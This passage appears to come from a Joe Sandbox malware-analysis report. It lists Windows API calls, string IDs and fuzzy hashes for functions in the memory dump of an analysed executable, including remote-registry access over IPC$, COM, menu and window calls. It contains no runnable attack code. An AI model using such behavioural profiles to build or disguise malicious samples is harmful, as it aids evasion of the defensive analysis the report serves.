                                                                                                                                                                                          • Instruction Fuzzy Hash: C2412DB290011DFADF15EBE0DD4ADEEB778AF14340F504065B601B6092DB796F49CBA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00738577: _wcslen.LIBCMT ref: 0073858A
                                                                                                                                                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00791093
                                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 007910AF
                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 007910CB
                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 007910F5
                                                                                                                                                                                          • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0079111D
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00791128
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0079112D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                          • API String ID: 323675364-22481851
                                                                                                                                                                                          • Opcode ID: 86cfd76dd4b19ed302c9f6e1909e0c4293e44ef6efc170393f0a40a24757b2e0
                                                                                                                                                                                          • Instruction ID: 19ca401bf37aabd00d603c4d5cb04c470e7149b733c120bfec2d46a3129ed267
                                                                                                                                                                                          • Opcode Fuzzy Hash: 86cfd76dd4b19ed302c9f6e1909e0c4293e44ef6efc170393f0a40a24757b2e0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5141F872C1022DEBDF21EBA4EC99DEEB778FF04750F404069EA01A2161EB799E54CB50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 007C4AD9
                                                                                                                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 007C4AE0
                                                                                                                                                                                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 007C4AF3
                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 007C4AFB
                                                                                                                                                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 007C4B06
                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 007C4B10
                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 007C4B1A
                                                                                                                                                                                          • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 007C4B30
                                                                                                                                                                                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 007C4B3C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                                          • String ID: static
                                                                                                                                                                                          • API String ID: 2559357485-2160076837
                                                                                                                                                                                          • Opcode ID: f2229b2c6725429c646a6e27abbc905d84454174247f78455a1760e7f34ba8c5
                                                                                                                                                                                          • Instruction ID: b1201152f70ab54aea04a5fe27c860114f1648bb705e402d18fab3089b2fd71d
                                                                                                                                                                                          • Opcode Fuzzy Hash: f2229b2c6725429c646a6e27abbc905d84454174247f78455a1760e7f34ba8c5
                                                                                                                                                                                          • Instruction Fuzzy Hash: C7313C72140219BBDF219F64DC08FDA3BA9FF09364F11422DFA15A61A0D779DC60DB98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 007B46B9
                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 007B46E7
                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 007B46F1
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007B478A
                                                                                                                                                                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 007B480E
                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 007B4932
                                                                                                                                                                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 007B496B
                                                                                                                                                                                          • CoGetObject.OLE32(?,00000000,007D0B64,?), ref: 007B498A
                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000), ref: 007B499D
                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 007B4A21
                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 007B4A35
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 429561992-0
                                                                                                                                                                                          • Opcode ID: 2c3a7d24c227044a0243527a65f83f49166294592dd3425d6031686b0b1d1e7a
                                                                                                                                                                                          • Instruction ID: eb8d62e4193e6c1684b64e6d9a853a123271ba60f378af6ebfea103cd5150854
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c3a7d24c227044a0243527a65f83f49166294592dd3425d6031686b0b1d1e7a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7EC125B1608305AFD700DF68C884A6BB7E9FF89748F10492DF9899B212DB35ED45CB52
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 007A8538
                                                                                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 007A85D4
                                                                                                                                                                                          • SHGetDesktopFolder.SHELL32(?), ref: 007A85E8
                                                                                                                                                                                          • CoCreateInstance.OLE32(007D0CD4,00000000,00000001,007F7E8C,?), ref: 007A8634
                                                                                                                                                                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 007A86B9
                                                                                                                                                                                          • CoTaskMemFree.OLE32(?,?), ref: 007A8711
                                                                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 007A879C
                                                                                                                                                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 007A87BF
                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 007A87C6
                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 007A881B
                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 007A8821
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2762341140-0
                                                                                                                                                                                          • Opcode ID: 6ca64e70110e5db0037f5ac85162d4bb831e105ae64174b5439c4c6f1c3b4cf7
                                                                                                                                                                                          • Instruction ID: 7114081be4cfdbcd930599938d59e8bba57899e0a80264bd9c4d347ebfa6de6f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ca64e70110e5db0037f5ac85162d4bb831e105ae64174b5439c4c6f1c3b4cf7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3FC13C75A00105EFDB54DFA4C888DAEBBF5FF49304B1481A8F9199B262DB34EE41CB91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0079039F
                                                                                                                                                                                          • SafeArrayAllocData.OLEAUT32(?), ref: 007903F8
                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 0079040A
                                                                                                                                                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 0079042A
                                                                                                                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 0079047D
                                                                                                                                                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00790491
                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 007904A6
                                                                                                                                                                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 007904B3
                                                                                                                                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007904BC
                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 007904CE
                                                                                                                                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007904D9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2706829360-0
                                                                                                                                                                                          • Opcode ID: f2899c650ef7d9fb94b987fb92a785593de13167945847ddf6c1ec6c6d6f0c81
                                                                                                                                                                                          • Instruction ID: b886f67dc34df400f54bac3cdc14379443ad0bda0483c7dc351f9da0691bbee9
                                                                                                                                                                                          • Opcode Fuzzy Hash: f2899c650ef7d9fb94b987fb92a785593de13167945847ddf6c1ec6c6d6f0c81
                                                                                                                                                                                          • Instruction Fuzzy Hash: C8416075A00259DFCF14DFA4D848DAEBBB9FF48354F008069EA45A7261DB38AE45CF90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcslen$BuffCharLower
                                                                                                                                                                                          • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                          • API String ID: 707087890-567219261
                                                                                                                                                                                          • Opcode ID: ea2ffba0c83791d8386823410774eeab5c8e55d3bf6377801b41e037d6a6716c
                                                                                                                                                                                          • Instruction ID: 911180a55f0e9606bce51bb3dcd5e2343fb89bce23ac3b8184e8cce98c301e05
                                                                                                                                                                                          • Opcode Fuzzy Hash: ea2ffba0c83791d8386823410774eeab5c8e55d3bf6377801b41e037d6a6716c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6051C331A00116DBCF14DF68C951AFEB3A5BF65364B204229EB76E7285DB39DD40C790
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CoInitialize.OLE32 ref: 007B41D1
                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 007B41DC
                                                                                                                                                                                          • CoCreateInstance.OLE32(?,00000000,00000017,007D0B44,?), ref: 007B4236
                                                                                                                                                                                          • IIDFromString.OLE32(?,?), ref: 007B42A9
                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 007B4341
                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 007B4393
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                          • API String ID: 636576611-1287834457
                                                                                                                                                                                          • Opcode ID: 6e728aab41dcc8794917500df1deced36a93d21a0232bac5206bc129e653b9b6
                                                                                                                                                                                          • Instruction ID: 6520f1d54ea7fb69c5602c43a51de2304f0ca6c3629c11b8bf10858a52652cac
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e728aab41dcc8794917500df1deced36a93d21a0232bac5206bc129e653b9b6
                                                                                                                                                                                          • Instruction Fuzzy Hash: CA61BE71608701EFD710DF64C889FAABBE4BF89714F040919F9819B292CB78ED44CB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 007A8C9C
                                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 007A8CAC
                                                                                                                                                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 007A8CB8
                                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007A8D55
                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 007A8D69
                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 007A8D9B
                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 007A8DD1
                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 007A8DDA
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                                          • API String ID: 1464919966-438819550
                                                                                                                                                                                          • Opcode ID: 688c84edbe5a240ff1c5632ae5c368218afb1e60d7b3716fc6801f951778e249
                                                                                                                                                                                          • Instruction ID: c089296af6f5a9a98ea5c410f662a11ef754541879dc0975877b2a86fdb794e2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 688c84edbe5a240ff1c5632ae5c368218afb1e60d7b3716fc6801f951778e249
                                                                                                                                                                                          • Instruction Fuzzy Hash: 58615EB2504305DFDB10EF60C84999EB7E8FF99320F04496DF98987251EB39E945CBA2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 007A3E14
                                                                                                                                                                                            • Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
                                                                                                                                                                                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 007A3E35
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LoadString$_wcslen
                                                                                                                                                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                                          • API String ID: 4099089115-3080491070
                                                                                                                                                                                          • Opcode ID: 81a5ba0a37da3c225e0158440b8398f6edf5537f66f7a78684d9fea1a31e1c4d
                                                                                                                                                                                          • Instruction ID: 719f224ed2ea2b93f8be2ebc3a2901d57f52cd5ab131fe723b11e19f396b026a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 81a5ba0a37da3c225e0158440b8398f6edf5537f66f7a78684d9fea1a31e1c4d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 955190B190020AFADF15EBA4DD4AEEEB778AF04340F104165B50572162EB792F59CF61
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 007A5DE5
                                                                                                                                                                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 007A5E5B
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 007A5E65
                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 007A5EEC
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                                                          • API String ID: 4194297153-14809454
                                                                                                                                                                                          • Opcode ID: 489862c6deb0d16ab66de4e2750cc4015732a2626e339c2ffcb2374aab567a65
                                                                                                                                                                                          • Instruction ID: 605fc10385080ad1fffb57a04e3669b3d3ceadad641d3477a216fe3505e9c458
                                                                                                                                                                                          • Opcode Fuzzy Hash: 489862c6deb0d16ab66de4e2750cc4015732a2626e339c2ffcb2374aab567a65
                                                                                                                                                                                          • Instruction Fuzzy Hash: CB31C535A04604DFDB10DF68C488AAABBB4EF86304F188169F505CF396D779DE42CB91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateMenu.USER32 ref: 007C4715
                                                                                                                                                                                          • SetMenu.USER32(?,00000000), ref: 007C4724
                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007C47AC
                                                                                                                                                                                          • IsMenu.USER32(?), ref: 007C47C0
                                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 007C47CA
                                                                                                                                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007C47F7
                                                                                                                                                                                          • DrawMenuBar.USER32 ref: 007C47FF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                                          • String ID: 0$F
                                                                                                                                                                                          • API String ID: 161812096-3044882817
                                                                                                                                                                                          • Opcode ID: 6897fbeedae7879ff2c437a1d2e358d110a48b612c37b64137acc5eb848d598f
                                                                                                                                                                                          • Instruction ID: e5c64b3727bd9bea3fc76795d55b7fe55b65492d9b2e4901dbfc84c035b6199e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6897fbeedae7879ff2c437a1d2e358d110a48b612c37b64137acc5eb848d598f
                                                                                                                                                                                          • Instruction Fuzzy Hash: D5415475A01209AFDB24CFA4E998FAA7BF5FF09314F14402CEA46A7360C778AD14CB50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
                                                                                                                                                                                            • Part of subcall function 007945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00794620
                                                                                                                                                                                          • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 007928B1
                                                                                                                                                                                          • GetDlgCtrlID.USER32 ref: 007928BC
                                                                                                                                                                                          • GetParent.USER32 ref: 007928D8
                                                                                                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 007928DB
                                                                                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 007928E4
                                                                                                                                                                                          • GetParent.USER32(?), ref: 007928F8
                                                                                                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 007928FB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
